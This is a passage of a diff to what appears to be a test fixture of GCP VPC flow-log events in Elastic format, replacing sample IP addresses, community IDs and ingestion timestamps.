us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", "end": "2019-06-14T03:49:37.933338264Z", @@ -13000,17 +13000,17 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41818, "bytes": 0, - "ip": "198.51.100.182", + "ip": "67.43.156.14", "packets": 4 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+MSnEfQ6PdDGsHX0nTeNna2fZHI=", + "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -13024,7 +13024,7 @@ }, "related": { "ip": [ - "198.51.100.182", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -13049,8 +13049,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868904300Z", - "original": "{\"insertId\":\"bxuq05fhgmw9d\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"198.51.100.182\",\"src_port\":41818},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:13.478093057Z\",\"packets_sent\":\"4\",\"reporter\":\"DEST\",\"rtt_msec\":\"1350\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391895Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9d\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41818},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:13.478093057Z\",\"packets_sent\":\"4\",\"reporter\":\"DEST\",\"rtt_msec\":\"1350\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:11.031370298Z", "end": "2019-06-14T03:40:13.478093057Z", @@ -13071,10 +13071,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -13088,7 +13088,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:m8TzhysIkslBtL9JjV+tquk6V/g=", + "community_id": "1:KTuz6NE5trahWJ94CUsvoASfpt8=", "bytes": 4580, "name": "default", "transport": "tcp", @@ -13111,7 +13111,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -13144,8 +13144,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868912500Z", - "original": "{\"insertId\":\"bxuq05fhgmw90\",\"jsonPayload\":{\"bytes_sent\":\"4580\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"60\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391900700Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw90\",\"jsonPayload\":{\"bytes_sent\":\"4580\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"60\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", "end": "2019-06-14T03:49:56.461240929Z", @@ -13174,17 +13174,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65322, "bytes": 270437, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 668 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:tXtxtPy6IFZbzlCNEMTqkkfU37w=", + "community_id": "1:aRPYFHez0LD3jAm92mNT3UC23bE=", "bytes": 270437, "transport": "tcp", "type": "ipv4", @@ -13198,7 +13198,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -13223,8 +13223,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868915600Z", - "original": "{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391906300Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw8w\",\"jsonPayload\":{\"bytes_sent\":\"270437\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65322},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"668\",\"reporter\":\"DEST\",\"rtt_msec\":\"92\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.703392247Z", "end": "2019-06-14T03:49:55.408936364Z", @@ -13247,9 +13247,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65322, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -13263,7 +13263,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:tXtxtPy6IFZbzlCNEMTqkkfU37w=", + "community_id": "1:aRPYFHez0LD3jAm92mNT3UC23bE=", "bytes": 19019, "transport": "tcp", "type": "ipv4", @@ -13278,7 +13278,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -13302,8 +13302,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868918400Z", - "original": "{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391911700Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw94\",\"jsonPayload\":{\"bytes_sent\":\"19019\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65322,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.408936364Z\",\"packets_sent\":\"604\",\"reporter\":\"SRC\",\"rtt_msec\":\"92\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.703392247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.703392247Z", "end": "2019-06-14T03:49:55.408936364Z", @@ -13330,18 +13330,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 16208, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 80 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:AXYYDUibiLRs7tXVqml9vhtY2wY=", + "community_id": "1:XDhlyCx6ikMFDl8JVik4ROYVJJY=", "bytes": 16208, "name": "default", "transport": "tcp", @@ -13363,7 +13363,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -13400,8 +13400,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868921300Z", - "original": "{\"insertId\":\"bxuq05fhgmw8x\",\"jsonPayload\":{\"bytes_sent\":\"16208\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391917200Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw8x\",\"jsonPayload\":{\"bytes_sent\":\"16208\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", "end": "2019-06-14T03:49:51.789269849Z", @@ -13422,10 +13422,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -13439,7 +13439,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AXYYDUibiLRs7tXVqml9vhtY2wY=", + "community_id": "1:XDhlyCx6ikMFDl8JVik4ROYVJJY=", "bytes": 9800, "name": "default", "transport": "tcp", @@ -13462,7 +13462,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -13498,8 +13498,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868924300Z", - "original": "{\"insertId\":\"bxuq05fhgmw8v\",\"jsonPayload\":{\"bytes_sent\":\"9800\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391922600Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw8v\",\"jsonPayload\":{\"bytes_sent\":\"9800\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789269849Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.455711202Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.455711202Z", "end": "2019-06-14T03:49:51.789269849Z", @@ -13526,17 +13526,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58026, "bytes": 1467, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:iqLE2ZKPjY+4CpYdTYZLcB7D1xk=", + "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -13550,7 +13550,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
@@ -13575,8 +13575,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868927200Z", - "original": "{\"insertId\":\"bxuq05fhgmw8z\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":58026},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"40\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391928100Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw8z\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58026},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"40\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:49:08.995009558Z", "end": "2019-06-14T03:49:09.114674887Z", @@ -13603,18 +13603,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 19506, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 180 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:d+9cs8ZSIwCZUTV/HN9P0arhfqU=", + "community_id": "1:xK6qqvSvQC9vUS1J4R94Va2tqkE=", "bytes": 19506, "name": "default", "transport": "tcp", @@ -13636,7 +13636,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -13670,8 +13670,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868930100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9b\",\"jsonPayload\":{\"bytes_sent\":\"19506\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391933700Z", + "original": 
"{\"insertId\":\"bxuq05fhgmw9b\",\"jsonPayload\":{\"bytes_sent\":\"19506\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", "end": "2019-06-14T03:49:59.597223164Z", @@ -13698,17 +13698,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 32882, "bytes": 1496, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:JBPQPPGDjRGxMSu2nEFLssfmXHs=", + "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", "bytes": 1496, "transport": "tcp", "type": "ipv4", @@ -13722,7 +13722,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
